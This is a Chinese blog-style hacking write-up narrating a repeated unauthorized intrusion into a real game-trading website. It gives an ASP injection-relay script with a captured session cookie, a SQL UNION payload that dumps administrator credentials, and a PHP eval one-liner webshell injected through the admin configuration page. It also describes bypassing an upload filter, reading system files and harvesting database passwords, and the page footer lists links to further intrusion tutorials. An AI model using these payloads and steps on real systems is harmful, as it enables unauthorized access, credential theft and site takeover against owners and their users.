入侵某一游戏交易网

所属分类: 网络安全 / 黑客入侵 阅读数: 2250
收藏 0 赞 0 分享
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程

一: 踩点 收集信息

因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握

服务器上13个站点,大多数站点很安全,因为第一渗透的时候,是由

http://www.shanXXX.XX 这个站进入的

我这个人比较恋旧,所以第二次也决定由这个站点进行入侵,

由后台看出这个站的程序是RAICO_V1[1].2_CS 如图1



直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵

二: 漏洞在哪里?它在灯火阑珊处

这个程序的漏洞文件是在post_task_review.php

由于过滤不严格导致注入,下面我会在文章中详细说明如何利用,

首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件

内容如下

http://www.shanXXX.XX/post_task_review.php"

JmRef="http://www.shanXXX.XX/post_task.php"

JmCok="__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3"

JmStr=URLEncoding(JmStr)

response.write PostData(JMUrl,JmStr,JmCok,JmRef)

Function PostData(PostUrl,PostStr,PostCok,PostRef)

Dim Http

Set Http = Server.CreateObject("msxml2.serverXMLHTTP")

With Http

.Open "POST",PostUrl,False

.SetRequestHeader "Content-Length",Len(PostStr)

.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"

.SetRequestHeader "Referer",PostRef

.SetRequestHeader "Cookie",PostCok

.Send PostStr

PostData = .ResponseBody

End With

Set Http = Nothing

PostData =bytes2BSTR(PostData)

End Function

Function bytes2BSTR(vIn)

Dim strReturn

Dim I, ThisCharCode, NextCharCode

strReturn = ""

For I = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn, I, 1))

If ThisCharCode

之后浏览地址为http://localhost/jmpost.asp?id=1107 and 1=2 union select -1,concat(admin_name,admin_pw) from rco_admin/* 就可以直接爆出管理员的用户名和密码 如图2



三: 获取webshell 拿到目标站的路径.

登陆后台

,只能上传图片,抓包上传,截断 ,未能实现.

但是后台的配置那可以插一句话

a'";@eval($_POST[cmd]);//

写进去本来是site="a\'\";@eval"

但是过滤了'

就成了site="a\\";@eval;//"

这样成功的闭合了前面的双引,把后面的双引注释掉了.中间的;@eval($_POST[cmd]);就可以执行了.

把a'";@eval($_POST[cmd]);// 写进去就保存到一个文件里了.

这个文件被所有的文件包含.

所以我们直接同一句话连接端连接网站的任何一个文件都可以获得webshell. 如图





直接传php没传上去,所以把php马改成jpg格式的,之后在一句话连接端中修改成php的

顺利拿到webshell如图,


linux的服务器执行 cat /etc/password 获得目标站的路径,如图6



直接跳转到目标站的目录, 全是0644,尝试过提权 但是反弹不了,后来才知道是服务器连不上网.

搞到这里,应该是大功告成了,传马,ok!

四:意外情况,不是意外收获.

上传木马成功,惊喜之余,去访问shell地址,

错误 Not Found.

经验告诉我,可能是换了服务器,因为这样的游戏站基本上都是变态,被搞一次,安全性就加大N倍,很黄,很强大.

ping 了下ip 发现真的换了服务器.

五:峰回路转

不过还是用的原来的程序,这里我就想了,程序都没换,数据库也应该没换吧,

找到原来服务器的数据库连接文件,查看到数据库的密码 如图7





连接,之前通过目录看到这个站有个论坛,数据库里也有bbs member这个表,

是否可以通过这个获取新服务器的webshell呢?

查看 如图8



通过程序访问地址

XXX.XXX.XXX/bbs/index.php

我靠 是dz6.0

不过还好,以前看过好象是可以拿webshell



登陆,成功 如图

进入后台 找到模板编辑语言包,但是它竟然提示没有权限....

如图



到此 我的入侵就告于段落了,因为目前为止好象还没有其他办法获取dz6.0的webshell....

这次渗透有点迂回,虽然没有达到最后的目的,但是还是有一些经验可以供大家参考的

再次感谢我的好友jackal!
更多精彩内容其他人还在看

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享

传世木马盗号过程分析

玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木马盗号的原理(如果有那位大侠认为不够准确或是原理有所出入
收藏 0 赞 0 分享

浅析*NIX机器的入侵

目前来说*NIX机器早已经成为INTERNRT的主流服务器操作系统了,UNIX系列系统的优势相WINDOWS比较而言优势也是显而易见的。 而与之接口的脚本目前来说是以PHP MYSQL为主。当然也不乏大公司用JSP和CGI和PL,不过CGI和PL的处理相对比较困难一点,容易造
收藏 0 赞 0 分享

一次透过SNIFF有目的性的入侵

一次透过SNIFF有目的性的入侵 所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SNIFF 宿舍装了ADSL,我疯狂地在网上看电影和在QQ里泡MM(也可能是恐龙吧 :( )。网络入侵和安全方面的学习已经荒废了好一段时间
收藏 0 赞 0 分享

渗透日本服务器群

因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^ 开局: 入手点是一个注射点:sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。 以下是引用片段: down.vbs iLocal = LCase(WScript.Ar
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程2

遇阻:寻找VOD电影   首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。   可随后
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程1

最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路
收藏 0 赞 0 分享

入侵藏在防火墙后面的机子

事情是这样的: 遭遇一台湾的dns服务器,win2003 server 扫描器报告的开放端口:21,53,80 ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.
收藏 0 赞 0 分享

看清黑客穿透ADSL路由入侵内网

也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。 一.扫描 现在很多ADSL MODEM都是通过80、2
收藏 0 赞 0 分享
查看更多